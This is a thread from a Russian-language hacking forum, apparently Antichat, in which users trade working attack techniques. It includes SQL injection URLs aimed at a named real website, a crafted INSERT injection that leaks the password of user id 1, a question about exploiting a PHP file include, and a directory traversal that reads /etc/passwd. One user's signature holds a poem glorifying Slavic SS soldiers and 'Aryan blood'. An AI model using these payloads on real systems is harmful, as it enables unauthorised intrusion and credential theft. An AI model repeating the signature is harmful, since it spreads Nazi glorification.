
12.09.2012, 23:20
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
http://www.cellapplications.com/product_desc.php?id=-1919'+union+select+1,2,3,4,5,6+--+
как быть?
|
|
|

12.09.2012, 23:39
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
Сообщение от OxoTnik
как вариант 5.1.49-1ubuntu8
Пробелы убрать
ну, что можно раскрутить как слепую, я знаю
а если как обычную, ни как?
|
|
|

13.09.2012, 00:21
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
Сообщение от OxoTnik
Нука поподробнее расскажи :ebak:
я имел ввиду через ерор базед
опечатался, с кем не бывает)
меня больше интересует, раскрутить как обычную...
|
|
|

13.09.2012, 07:08
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от smirk
я имел ввиду через ерор базед
опечатался, с кем не бывает)
меня больше интересует, раскрутить как обычную...
Не сочти за трололо - но "как обычную" - это как ??
Охотник предложил тебе полностью рабочий вариант, с максимальной выдачей информации ( не Blind и не Time-Based), а что ещё тебе надо ?
Следовать классике - имхо, дурной тон. Это шаблонное мышление, так ты далеко не уйдёшь. Так и останешься работать на старенькой Win95 ?
В уязвимостях, как я считаю, нет понятия "обычная". Все они "необычные" - разные и требуют разных методов реализации. А если ты следуешь шаблонам и по-другому не умеешь мыслить и реализовывать, может дальше и не стоит пробовать, а ?
З.Ы. для люителей шаблонно мыслить
Код:
_ttp://www.cellapplications.com/product_desc.php?id=1919'+and+substring((@@version),1,1)='5
|
|
|

13.09.2012, 21:56
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
Всем привет! Есть вопрос ... Можно раскрутить инклуд в таком коде?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"] $page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/[\x80-\xFF]/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\r"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\0"[/COLOR][COLOR="#007700"]), array([/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]ENT_QUOTES[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Show'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ucwords[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'Page'[/COLOR][COLOR="#007700"];
if(![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'test/class.'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) {
exit([/COLOR][COLOR="#DD0000"]'error'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// Added Autoload in feature Versions
[/COLOR][COLOR="#007700"]require([/COLOR][COLOR="#DD0000"]'test/class.'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
П.с волнует вопрос если можно обрезать то что идёт ДО переменной
|
|
|

14.09.2012, 13:31
|
|
Новичок
Регистрация: 23.02.2011
Сообщений: 2
С нами:
8008886
Репутация:
0
|
|
Сообщение от None
INSERT INTO table1 (user_from,
user_to,message
,edittime) VALUES('10',
'10','mess'
,'1347608937')
Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?
|
|
|

14.09.2012, 15:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от Basters
Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?
а какой ты результат хочешь?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

15.09.2012, 01:49
|
|
Новичок
Регистрация: 23.02.2011
Сообщений: 2
С нами:
8008886
Репутация:
0
|
|
Сообщение от HAXTA4OK
а какой ты результат хочешь?
Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...
|
|
|

15.09.2012, 08:28
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Basters
Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...
http://www.mysql.ru/docs/man/SELECT.html
INSERT INTO table1 (user_from,user_to,message,edittime) VALUES('10','10',(Select `pass` From `user` WHERE id=1),'1347608937')+--+#user_to,message,edittime) VALUES('10','10','mess','1347608937')
|
|
|

15.09.2012, 16:43
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Здравствуйте нашел Directory Traversal
http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|